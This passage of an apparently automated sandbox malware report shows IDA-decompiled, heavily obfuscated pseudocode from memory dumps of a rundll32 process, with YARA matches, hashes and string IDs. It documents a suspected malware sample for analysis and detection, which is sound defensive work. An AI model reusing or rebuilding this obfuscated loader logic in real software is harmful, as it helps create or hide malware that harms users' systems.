                                                                      											_t272 =  &(_t272[0xa]);
                                                                      											if(_t238 != 0xffffffff) {
                                                                      												_t265 = 0x7641b8a;
                                                                      												continue;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						goto L20;
                                                                      					}
                                                                      					_t230 = E01FF47EB();
                                                                      					_t267 = _v588 - _v548;
                                                                      					_t246 = _v584;
                                                                      					asm("sbb ecx, [esp+0x94]");
                                                                      					__eflags = _t246 - _t261;
                                                                      					if(__eflags >= 0) {
                                                                      						if(__eflags > 0) {
                                                                      							L17:
                                                                      							_t239 = 1;
                                                                      							__eflags = 1;
                                                                      						} else {
                                                                      							__eflags = _t267 - _t230;
                                                                      							if(_t267 >= _t230) {
                                                                      								goto L17;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					_t265 = 0x8e8e3cb;
                                                                      					L19:
                                                                      					__eflags = _t265 - 0x8e8e3cb;
                                                                      				} while (__eflags != 0);
                                                                      				L20:
                                                                      				return _t239;
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .vl$$z$))$VE$c^$mv$uq
                                                                      • API String ID: 0-129554973
                                                                      • Opcode ID: ee9812c7270f18a38839004d5a8fb2575288c372572a24ef6638758e56e56959
                                                                      • Instruction ID: f8b64368b852ac9f41bad786ed06e6aa79dbf5b38d683d589ae2344ce488264f
                                                                      • Opcode Fuzzy Hash: ee9812c7270f18a38839004d5a8fb2575288c372572a24ef6638758e56e56959
                                                                      • Instruction Fuzzy Hash: 00B114729083419FE368CF29C58990BBBF1BBC5718F404A1CF6D5962A0D7BA9909CF47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .vl$$z$))$VE$c^$mv$uq
                                                                      • API String ID: 0-129554973
                                                                      • Opcode ID: df02dcf10120f5ed3c1aa02081fe2585210939953c6582f116513764aba39f46
                                                                      • Instruction ID: 20a6aee2906adecbc4e23cb7d8f30c261731879da4a26c8a49a3a06ea62d8ef2
                                                                      • Opcode Fuzzy Hash: df02dcf10120f5ed3c1aa02081fe2585210939953c6582f116513764aba39f46
                                                                      • Instruction Fuzzy Hash: 4FB131B29183819FE368CE25C48991BFBF1BBC5718F004A1CF5D9962A0D3B98959CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0200434E() {
                                                                      				intOrPtr _v4;
                                                                      				intOrPtr _v8;
                                                                      				intOrPtr _v12;
                                                                      				intOrPtr _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _t172;
                                                                      				signed int _t176;
                                                                      				void* _t179;
                                                                      				void* _t200;
                                                                      				intOrPtr _t206;
                                                                      				signed int _t207;
                                                                      				signed int _t208;
                                                                      				signed int _t209;
                                                                      				signed int _t210;
                                                                      				signed int _t211;
                                                                      				signed int _t212;
                                                                      				intOrPtr* _t214;
                                                                      				signed int* _t216;
                                                                      
                                                                      				_t216 =  &_v80;
                                                                      				_v16 = 0x14d035;
                                                                      				_v12 = 0x6b8268;
                                                                      				_t179 = 0xb19f7ca;
                                                                      				_t206 = 0;
                                                                      				_v8 = 0;
                                                                      				_v4 = 0;
                                                                      				_v32 = 0x3622;
                                                                      				_v32 = _v32 >> 3;
                                                                      				_v32 = _v32 ^ 0x000106c4;
                                                                      				_v40 = 0x4e9a;
                                                                      				_v40 = _v40 >> 0xc;
                                                                      				_v40 = _v40 ^ 0x000001e1;
                                                                      				_v80 = 0xc10;
                                                                      				_v80 = _v80 >> 9;
                                                                      				_t207 = 0x7c;
                                                                      				_v80 = _v80 / _t207;
                                                                      				_v80 = _v80 >> 0xf;
                                                                      				_v80 = _v80 ^ 0x0000249f;
                                                                      				_v64 = 0x9f18;
                                                                      				_v64 = _v64 >> 0xb;
                                                                      				_v64 = _v64 + 0xffff1ff5;
                                                                      				_v64 = _v64 | 0x0b80b4b6;
                                                                      				_v64 = _v64 ^ 0xffff9b0d;
                                                                      				_v36 = 0x945d;
                                                                      				_v36 = _v36 + 0xffff610d;
                                                                      				_v36 = _v36 ^ 0xffffd8f7;
                                                                      				_v48 = 0x2aad;
                                                                      				_t208 = 0x7f;
                                                                      				_v48 = _v48 / _t208;
                                                                      				_v48 = _v48 ^ 0x00003e6e;
                                                                      				_v56 = 0xddc4;
                                                                      				_t209 = 0x5e;
                                                                      				_v56 = _v56 * 0x14;
                                                                      				_v56 = _v56 + 0xffff71f7;
                                                                      				_v56 = _v56 ^ 0x001091c0;
                                                                      				_v68 = 0xa802;
                                                                      				_v68 = _v68 ^ 0x67e8667b;
                                                                      				_v68 = _v68 >> 0xc;
                                                                      				_v68 = _v68 * 0x47;
                                                                      				_v68 = _v68 ^ 0x01cd2f8d;
                                                                      				_v52 = 0xc142;
                                                                      				_v52 = _v52 * 0x44;
                                                                      				_v52 = _v52 ^ 0x822744f1;
                                                                      				_v52 = _v52 ^ 0x82146dfa;
                                                                      				_v72 = 0xbd15;
                                                                      				_v72 = _v72 / _t209;
                                                                      				_v72 = _v72 ^ 0x12aa425e;
                                                                      				_v72 = _v72 | 0x2ffcb14d;
                                                                      				_v72 = _v72 ^ 0x3ffeb451;
                                                                      				_v76 = 0x6e7b;
                                                                      				_v76 = _v76 >> 0xb;
                                                                      				_v76 = _v76 >> 3;
                                                                      				_v76 = _v76 / _t209;
                                                                      				_v76 = _v76 ^ 0x00006fef;
                                                                      				_v20 = 0x31f;
                                                                      				_v20 = _v20 | 0xb0d9e19e;
                                                                      				_v20 = _v20 ^ 0xb0d9bf73;
                                                                      				_v60 = 0x7aa7;
                                                                      				_t178 = _v20;
                                                                      				_t210 = 0x41;
                                                                      				_v60 = _v60 / _t210;
                                                                      				_t211 = 0x59;
                                                                      				_t215 = _v20;
                                                                      				_v60 = _v60 * 0x36;
                                                                      				_t212 = _v20;
                                                                      				_v60 = _v60 / _t211;
                                                                      				_v60 = _v60 ^ 0x0000613c;
                                                                      				_v24 = 0x73cc;
                                                                      				_v24 = _v24 >> 0xc;
                                                                      				_v24 = _v24 ^ 0x00003ffa;
                                                                      				_v28 = 0xa6c1;
                                                                      				_v28 = _v28 >> 3;
                                                                      				_v28 = _v28 ^ 0x0000757c;
                                                                      				_v44 = 0x6c53;
                                                                      				_v44 = _v44 | 0xc78368a0;
                                                                      				_v44 = _v44 ^ 0xc78c6ccc;
                                                                      				while(1) {
                                                                      					L1:
                                                                      					_t200 = 0x5c;
                                                                      					do {
                                                                      						L2:
                                                                      						while(_t179 != 0xa00144c) {
                                                                      							if(_t179 == 0xb19f7ca) {
                                                                      								_t179 = 0x2b2ed007;
                                                                      								continue;
                                                                      							} else {
                                                                      								if(_t179 == 0xbc9e916) {
                                                                      									E01FF5AB8(_v20, _v60, _v24, _v28, _t178);
                                                                      								} else {
                                                                      									if(_t179 == 0x118767b3) {
                                                                      										E01FF5AB8(_v68, _v52, _v72, _v76, _t215);
                                                                      										_t216 =  &(_t216[3]);
                                                                      										_t179 = 0xbc9e916;
                                                                      										while(1) {
                                                                      											L1:
                                                                      											_t200 = 0x5c;
                                                                      											goto L2;
                                                                      										}
                                                                      									} else {
                                                                      										if(_t179 == 0x2b2ed007) {
                                                                      											_t214 =  *0x2011088 + 0x38;
                                                                      											while( *_t214 != _t200) {
                                                                      												_t214 = _t214 + 2;
                                                                      											}
                                                                      											_t212 = _t214 + 2;
                                                                      											_t179 = 0x39878866;
                                                                      											continue;
                                                                      										} else {
                                                                      											if(_t179 == 0x39878866) {
                                                                      												_t176 = E0200340E(_v40, _v80, _t179, _t179, _v44);
                                                                      												_t178 = _t176;
                                                                      												_t216 =  &(_t216[3]);
                                                                      												if(_t176 != 0) {
                                                                      													_t179 = 0xa00144c;
                                                                      													while(1) {
                                                                      														L1:
                                                                      														_t200 = 0x5c;
                                                                      														goto L2;
                                                                      													}
                                                                      												}
                                                                      											} else {
                                                                      												if(_t179 != 0x3a731069) {
                                                                      													goto L21;
                                                                      												} else {
                                                                      													E01FFFF0D(_v48, _v56, _t215);
                                                                      													_t206 =  !=  ? 1 : _t206;
                                                                      													_t179 = 0x118767b3;
                                                                      													while(1) {
                                                                      														L1:
                                                                      														_t200 = 0x5c;
                                                                      														goto L2;
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							L24:
                                                                      							return _t206;
                                                                      						}
                                                                      						_t172 = E02000321(_t178, _v32, _v64, _v36, _t212);
                                                                      						_t215 = _t172;
                                                                      						_t216 =  &(_t216[3]);
                                                                      						if(_t172 == 0) {
                                                                      							_t179 = 0xbc9e916;
                                                                      							_t200 = 0x5c;
                                                                      							goto L21;
                                                                      						} else {
                                                                      							_t179 = 0x3a731069;
                                                                      							goto L1;
                                                                      						}
                                                                      						goto L24;
                                                                      						L21:
                                                                      					} while (_t179 != 0x1689c33b);
                                                                      					goto L24;
                                                                      				}
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "6$<a$Sl$n>${fg$|u$o
                                                                      • API String ID: 0-4282296459
                                                                      • Opcode ID: f21b342b501d6933e5575afd9939822380d3693eb732ec4aa776090728751466
                                                                      • Instruction ID: f52bcc8afca7dc020fb2fed6853887ebcb923c7b963920f58d6c569a7d329267
                                                                      • Opcode Fuzzy Hash: f21b342b501d6933e5575afd9939822380d3693eb732ec4aa776090728751466
                                                                      • Instruction Fuzzy Hash: 7A8153715083419FE358CF25D98981FBBF2BBD4358F044A1DF68A962A0D7B58A48CF87
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "6$<a$Sl$n>${fg$|u$o
                                                                      • API String ID: 0-4282296459
                                                                      • Opcode ID: 069db1e7bab7f3b13c41ed17f6fbf742274518a040dc86f1bdc138483ea4e4bf
                                                                      • Instruction ID: 530bc75f7c6c9f94f2ec2eaf015230b957acd5bcc72bf9cf2f09603fa538c312
                                                                      • Opcode Fuzzy Hash: 069db1e7bab7f3b13c41ed17f6fbf742274518a040dc86f1bdc138483ea4e4bf
                                                                      • Instruction Fuzzy Hash: 1D8155715183429FD318CF25C98A41BFBF1FBD4358F144A1EF59A962A0C7B58A49CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 88%
                                                                      			E01FFECFE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20) {
                                                                      				signed int _v4;
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				void* _t116;
                                                                      				signed int _t127;
                                                                      				void* _t129;
                                                                      				void* _t138;
                                                                      				signed int* _t141;
                                                                      
                                                                      				_push(_a20);
                                                                      				_push(0xffffffff);
                                                                      				_push(0);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t116);
                                                                      				_v20 = 0x26c0;
                                                                      				_t141 =  &(( &_v56)[7]);
                                                                      				_v20 = _v20 ^ 0x5664ed39;
                                                                      				_t138 = 0;
                                                                      				_v20 = _v20 ^ 0x56649557;
                                                                      				_t129 = 0x182a63aa;
                                                                      				_v48 = 0x49af;
                                                                      				_v48 = _v48 + 0x9fa0;
                                                                      				_v48 = _v48 ^ 0xbfb607f5;
                                                                      				_v48 = _v48 | 0x3e98ce00;
                                                                      				_v48 = _v48 ^ 0xbfbeae2a;
                                                                      				_v44 = 0xe339;
                                                                      				_v44 = _v44 << 8;
                                                                      				_v44 = _v44 + 0xffffc89f;
                                                                      				_v44 = _v44 ^ 0x00e37c5d;
                                                                      				_v52 = 0x404f;
                                                                      				_v52 = _v52 >> 0xe;
                                                                      				_v52 = _v52 * 6;
                                                                      				_v52 = _v52 | 0x81baeb5b;
                                                                      				_v52 = _v52 ^ 0x81bad7ee;
                                                                      				_v24 = 0x7b81;
                                                                      				_v24 = _v24 >> 6;
                                                                      				_v24 = _v24 ^ 0x000042e8;
                                                                      				_v56 = 0x974b;
                                                                      				_v56 = _v56 + 0xec91;
                                                                      				_v56 = _v56 * 0x5d;
                                                                      				_v56 = _v56 >> 6;
                                                                      				_v56 = _v56 ^ 0x00026e38;
                                                                      				_v36 = 0x4dfa;
                                                                      				_v36 = _v36 * 5;
                                                                      				_v36 = _v36 + 0xe29b;
                                                                      				_v36 = _v36 ^ 0x00025248;
                                                                      				_v40 = 0xa60b;
                                                                      				_v40 = _v40 * 0x3d;
                                                                      				_v40 = _v40 + 0xffff1aad;
                                                                      				_v40 = _v40 ^ 0x0026c01f;
                                                                      				_v4 = 0xcf11;
                                                                      				_v4 = _v4 + 0x8c52;
                                                                      				_v4 = _v4 ^ 0x0001090b;
                                                                      				_v28 = 0xbe78;
                                                                      				_v28 = _v28 + 0xc58c;
                                                                      				_v28 = _v28 >> 3;
                                                                      				_v28 = _v28 ^ 0x00002e12;
                                                                      				_v8 = 0x6ce6;
                                                                      				_v8 = _v8 + 0x5143;
                                                                      				_v8 = _v8 ^ 0x0000f5d1;
                                                                      				_t137 = _v4;
                                                                      				_v12 = 0xe698;
                                                                      				_v12 = _v12 << 4;
                                                                      				_v12 = _v12 ^ 0x000e27c4;
                                                                      				_v32 = 0x833d;
                                                                      				_v32 = _v32 << 0xf;
                                                                      				_v32 = _v32 + 0xb306;
                                                                      				_v32 = _v32 ^ 0x419f4493;
                                                                      				_v16 = 0x1ad3;
                                                                      				_v16 = _v16 << 0xf;
                                                                      				_v16 = _v16 ^ 0x0d69ea92;
                                                                      				while(_t129 != 0x182a63aa) {
                                                                      					if(_t129 == 0x251a2d5f) {
                                                                      						E01FFF108(_v4, _v28, 0xffffffff, _a4, _a8, _v8, _t129, _v12, _t137, _t138, _v32, _v16);
                                                                      					} else {
                                                                      						if(_t129 == 0x2efe34a0) {
                                                                      							_push(_t129);
                                                                      							_t138 = E01FF54FB(_t137 + _t137);
                                                                      							if(_t138 != 0) {
                                                                      								_t129 = 0x251a2d5f;
                                                                      								continue;
                                                                      							}
                                                                      						} else {
                                                                      							if(_t129 != 0x34522f7d) {
                                                                      								L10:
                                                                      								if(_t129 != 0x226dac5d) {
                                                                      									continue;
                                                                      								} else {
                                                                      								}
                                                                      							} else {
                                                                      								_t127 = E01FFF108(_v20, _v48, 0xffffffff, _a4, _a8, _v44, _t129, _v52, 0, 0, _v24, _v56);
                                                                      								_t137 = _t127;
                                                                      								_t141 =  &(_t141[0xa]);
                                                                      								if(_t127 != 0) {
                                                                      									_t129 = 0x2efe34a0;
                                                                      									continue;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					return _t138;
                                                                      				}
                                                                      				_t129 = 0x34522f7d;
                                                                      				goto L10;
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 9dV$CQ$O@$]|$}/R4$}/R4$B
                                                                      • API String ID: 0-3349067434
                                                                      • Opcode ID: a69a9a61e040f6e4c42a649665921e8b69e3d038fde6fb2fb45657c27c919242
                                                                      • Instruction ID: 3506956c6e5cb28631313e936b3b0d2f336597bfd3a39d201431bef4b34c41ee
                                                                      • Opcode Fuzzy Hash: a69a9a61e040f6e4c42a649665921e8b69e3d038fde6fb2fb45657c27c919242
                                                                      • Instruction Fuzzy Hash: 7B511372409341AFD759CF65C88981BBBE1BFC5768F504A0CF2A5562A1C3BACA49CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 9dV$CQ$O@$]|$}/R4$}/R4$B
                                                                      • API String ID: 0-3349067434
                                                                      • Opcode ID: 0cc39ec3a623dc590d3e177852770837a0dcb3af5c9f1e4bbfbd1694e5cae751
                                                                      • Instruction ID: 5aa378f73335963e549b4ab0fce9a9ca20a553736523d0d98c8e46b7cc2ca95d
                                                                      • Opcode Fuzzy Hash: 0cc39ec3a623dc590d3e177852770837a0dcb3af5c9f1e4bbfbd1694e5cae751
                                                                      • Instruction Fuzzy Hash: DB5126B1019342AFD758DF61C84981BFBE1BBC8768F504A0CF1A5562A0C3B9CA59DF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E01FFF9BA(void* __edx) {
                                                                      				void* __ecx;
                                                                      				void* _t230;
                                                                      				intOrPtr* _t252;
                                                                      				void* _t254;
                                                                      				intOrPtr _t260;
                                                                      				intOrPtr _t261;
                                                                      				intOrPtr _t266;
                                                                      				intOrPtr* _t272;
                                                                      				void* _t274;
                                                                      				signed int _t276;
                                                                      				intOrPtr _t305;
                                                                      				intOrPtr _t307;
                                                                      				intOrPtr* _t308;
                                                                      				signed int _t309;
                                                                      				signed int _t310;
                                                                      				signed int _t311;
                                                                      				signed int _t312;
                                                                      				signed int _t313;
                                                                      				signed int _t314;
                                                                      				signed int _t315;
                                                                      				intOrPtr _t316;
                                                                      				void* _t318;
                                                                      				void* _t319;
                                                                      				void* _t321;
                                                                      
                                                                      				_t272 =  *((intOrPtr*)(_t318 + 0x80));
                                                                      				_t308 =  *((intOrPtr*)(_t318 + 0x80));
                                                                      				_push(_t272);
                                                                      				_push( *((intOrPtr*)(_t318 + 0x8c)));
                                                                      				_push(_t308);
                                                                      				_push(__edx);
                                                                      				E02002550(_t230);
                                                                      				 *((intOrPtr*)(_t318 + 0x88)) = 0x1d8a34;
                                                                      				_t319 = _t318 + 0x14;
                                                                      				 *((intOrPtr*)(_t319 + 0x78)) = 0x5b8674;
                                                                      				_t307 = 0;
                                                                      				 *((intOrPtr*)(_t319 + 0x7c)) = 0;
                                                                      				 *(_t319 + 0x28) = 0xb766;
                                                                      				_t274 = 0x3039966c;
                                                                      				_t309 = 0x72;
                                                                      				 *(_t319 + 0x2c) =  *(_t319 + 0x28) / _t309;
                                                                      				 *(_t319 + 0x2c) =  *(_t319 + 0x2c) << 3;
                                                                      				 *(_t319 + 0x2c) =  *(_t319 + 0x2c) << 0xb;
                                                                      				 *(_t319 + 0x2c) =  *(_t319 + 0x2c) ^ 0x0066fe1e;
                                                                      				 *(_t319 + 0x28) = 0x26e;
                                                                      				 *(_t319 + 0x28) =  *(_t319 + 0x28) ^ 0x211d89c8;
                                                                      				_t310 = 0x74;
                                                                      				 *(_t319 + 0x28) =  *(_t319 + 0x28) / _t310;
                                                                      				 *(_t319 + 0x28) =  *(_t319 + 0x28) >> 4;
                                                                      				 *(_t319 + 0x28) =  *(_t319 + 0x28) ^ 0x000485a3;
                                                                      				 *(_t319 + 0x6c) = 0xe762;
                                                                      				 *(_t319 + 0x6c) =  *(_t319 + 0x6c) >> 1;
                                                                      				 *(_t319 + 0x6c) =  *(_t319 + 0x6c) ^ 0x00005f9f;
                                                                      				 *(_t319 + 0x68) = 0xaff4;
                                                                      				 *(_t319 + 0x68) =  *(_t319 + 0x68) + 0x7828;
                                                                      				 *(_t319 + 0x68) =  *(_t319 + 0x68) ^ 0x0001439f;
                                                                      				 *(_t319 + 0x34) = 0xcb25;
                                                                      				 *(_t319 + 0x34) =  *(_t319 + 0x34) + 0xffffb8d3;
                                                                      				 *(_t319 + 0x34) =  *(_t319 + 0x34) >> 0xa;
                                                                      				 *(_t319 + 0x34) =  *(_t319 + 0x34) + 0xffffe26e;
                                                                      				 *(_t319 + 0x34) =  *(_t319 + 0x34) ^ 0xffff9e5a;
                                                                      				 *(_t319 + 0x30) = 0xc32b;
                                                                      				 *(_t319 + 0x30) =  *(_t319 + 0x30) | 0xe65bb1cf;
                                                                      				_t311 = 0x26;
                                                                      				 *(_t319 + 0x2c) =  *(_t319 + 0x30) / _t311;
                                                                      				 *(_t319 + 0x2c) =  *(_t319 + 0x2c) ^ 0xfcdd71a1;
                                                                      				 *(_t319 + 0x2c) =  *(_t319 + 0x2c) ^ 0xfad2c55c;
                                                                      				 *(_t319 + 0x44) = 0x3fe0;
                                                                      				 *(_t319 + 0x44) =  *(_t319 + 0x44) + 0xffff9bb9;
                                                                      				 *(_t319 + 0x44) =  *(_t319 + 0x44) ^ 0x68f0e63f;
                                                                      				 *(_t319 + 0x44) =  *(_t319 + 0x44) ^ 0x970f0c5a;
                                                                      				 *(_t319 + 0x60) = 0x8a37;
                                                                      				 *(_t319 + 0x60) =  *(_t319 + 0x60) << 6;
                                                                      				 *(_t319 + 0x60) =  *(_t319 + 0x60) ^ 0x0022b94e;
                                                                      				 *(_t319 + 0x34) = 0x571;
                                                                      				 *(_t319 + 0x34) =  *(_t319 + 0x34) >> 0xe;
                                                                      				 *(_t319 + 0x34) =  *(_t319 + 0x34) + 0xffff24df;
                                                                      				 *(_t319 + 0x34) =  *(_t319 + 0x34) ^ 0xffff3e5c;
                                                                      				 *(_t319 + 0x4c) = 0x95d9;
                                                                      				 *(_t319 + 0x4c) =  *(_t319 + 0x4c) | 0xe7fe2ada;
                                                                      				 *(_t319 + 0x4c) =  *(_t319 + 0x4c) ^ 0xe7fea73a;
                                                                      				 *(_t319 + 0x40) = 0x73df;
                                                                      				 *(_t319 + 0x40) =  *(_t319 + 0x40) * 0x6b;
                                                                      				 *(_t319 + 0x40) =  *(_t319 + 0x40) + 0x4d5f;
                                                                      				 *(_t319 + 0x40) =  *(_t319 + 0x40) ^ 0x0030fb20;
                                                                      				 *(_t319 + 0x20) = 0xe6ed;
                                                                      				 *(_t319 + 0x20) =  *(_t319 + 0x20) >> 7;
                                                                      				 *(_t319 + 0x20) =  *(_t319 + 0x20) * 0x63;
                                                                      				_t312 = 0x6c;
                                                                      				 *(_t319 + 0x24) =  *(_t319 + 0x20) / _t312;
                                                                      				 *(_t319 + 0x24) =  *(_t319 + 0x24) ^ 0x000007c6;
                                                                      				 *(_t319 + 0x40) = 0xf0c6;
                                                                      				 *(_t319 + 0x40) =  *(_t319 + 0x40) + 0x590f;
                                                                      				 *(_t319 + 0x40) =  *(_t319 + 0x40) << 2;
                                                                      				 *(_t319 + 0x40) =  *(_t319 + 0x40) ^ 0x0005396a;
                                                                      				 *(_t319 + 0x60) = 0x3771;
                                                                      				 *(_t319 + 0x60) =  *(_t319 + 0x60) << 0xe;
                                                                      				 *(_t319 + 0x60) =  *(_t319 + 0x60) ^ 0x0ddc1ff2;
                                                                      				 *(_t319 + 0x5c) = 0x9a5a;
                                                                      				 *(_t319 + 0x5c) =  *(_t319 + 0x5c) >> 6;
                                                                      				 *(_t319 + 0x5c) =  *(_t319 + 0x5c) ^ 0x000002fa;
                                                                      				 *(_t319 + 0x58) = 0x55e2;
                                                                      				 *(_t319 + 0x58) =  *(_t319 + 0x58) ^ 0xef99e16a;
                                                                      				 *(_t319 + 0x58) =  *(_t319 + 0x58) ^ 0xef99b4e6;
                                                                      				 *(_t319 + 0x18) = 0xddcf;
                                                                      				 *(_t319 + 0x18) =  *(_t319 + 0x18) + 0xffffd9e8;
                                                                      				_t313 = 0x76;
                                                                      				 *(_t319 + 0x18) =  *(_t319 + 0x18) / _t313;
                                                                      				 *(_t319 + 0x18) =  *(_t319 + 0x18) ^ 0xfe0ce3a4;
                                                                      				 *(_t319 + 0x18) =  *(_t319 + 0x18) ^ 0xfe0c9dd3;
                                                                      				 *(_t319 + 0x54) = 0x5bdd;
                                                                      				 *(_t319 + 0x54) =  *(_t319 + 0x54) + 0xffd3;
                                                                      				 *(_t319 + 0x54) =  *(_t319 + 0x54) ^ 0x000145b1;
                                                                      				 *(_t319 + 0x3c) = 0x44f;
                                                                      				_t314 = 0x66;
                                                                      				 *(_t319 + 0x3c) =  *(_t319 + 0x3c) / _t314;
                                                                      				 *(_t319 + 0x3c) =  *(_t319 + 0x3c) ^ 0x4a8254b5;
                                                                      				 *(_t319 + 0x3c) =  *(_t319 + 0x3c) ^ 0x4a825342;
                                                                      				 *(_t319 + 0x14) = 0xc963;
                                                                      				 *(_t319 + 0x14) =  *(_t319 + 0x14) + 0x81df;
                                                                      				_t315 = 0x4e;
                                                                      				 *(_t319 + 0x10) =  *(_t319 + 0x14) * 0x2c;
                                                                      				 *(_t319 + 0x10) =  *(_t319 + 0x10) | 0x15242836;
                                                                      				 *(_t319 + 0x10) =  *(_t319 + 0x10) ^ 0x153cd105;
                                                                      				 *(_t319 + 0x1c) = 0xede;
                                                                      				 *(_t319 + 0x1c) =  *(_t319 + 0x1c) | 0xa2b3614c;
                                                                      				 *(_t319 + 0x1c) =  *(_t319 + 0x1c) * 0x5a;
                                                                      				_t316 =  *((intOrPtr*)(_t319 + 0x70));
                                                                      				 *(_t319 + 0x1c) =  *(_t319 + 0x1c) / _t315;
                                                                      				 *(_t319 + 0x1c) =  *(_t319 + 0x1c) ^ 0x00a7e5fc;
                                                                      				 *(_t319 + 0x18) = 0x965c;
                                                                      				 *(_t319 + 0x18) =  *(_t319 + 0x18) << 8;
                                                                      				 *(_t319 + 0x18) =  *(_t319 + 0x18) * 0x27;
                                                                      				 *(_t319 + 0x18) =  *(_t319 + 0x18) + 0xc4fd;
                                                                      				 *(_t319 + 0x18) =  *(_t319 + 0x18) ^ 0x16e8bc96;
                                                                      				while(1) {
                                                                      					_t251 =  *((intOrPtr*)(_t319 + 0x48));
                                                                      					while(1) {
                                                                      						L2:
                                                                      						_t321 = _t274 - 0x239299c3;
                                                                      						if(_t321 > 0) {
                                                                      							break;
                                                                      						}
                                                                      						if(_t321 == 0) {
                                                                      							E02000FE4(_t274,  *(_t319 + 0x6c));
                                                                      							_t274 = 0xabf6969;
                                                                      							while(1) {
                                                                      								_t251 =  *((intOrPtr*)(_t319 + 0x48));
                                                                      								goto L2;
                                                                      							}
                                                                      						}
                                                                      						if(_t274 == 0x6178099) {
                                                                      							_t274 = 0x2e2e6a11;
                                                                      							continue;
                                                                      						}
                                                                      						if(_t274 == 0xa9c22c2) {
                                                                      							if( *((intOrPtr*)(_t272 + 4)) < 0x74) {
                                                                      								L30:
                                                                      								return _t307;
                                                                      							}
                                                                      							_t274 = 0x6178099;
                                                                      							continue;
                                                                      						}
                                                                      						if(_t274 == 0xabf6969) {
                                                                      							if(_t307 == 0) {
                                                                      								E01FFDE81( *(_t319 + 0x6c),  *_t308,  *((intOrPtr*)(_t319 + 0x64)));
                                                                      							}
                                                                      							goto L30;
                                                                      						}
                                                                      						if(_t274 == 0xfdd9a18) {
                                                                      							_push(_t274);
                                                                      							_t266 =  *0x2010400; // 0x0
                                                                      							E01FF55B6( *((intOrPtr*)(_t319 + 0x74)),  *((intOrPtr*)(_t319 + 0x70)),  *((intOrPtr*)(_t319 + 0x94)),  *((intOrPtr*)(_t319 + 0x8c)),  *((intOrPtr*)(_t266 + 0x18)),  *(_t319 + 0x2c), _t274, _t274,  *(_t319 + 0x5c),  *(_t319 + 0x40),  *(_t319 + 0x14));
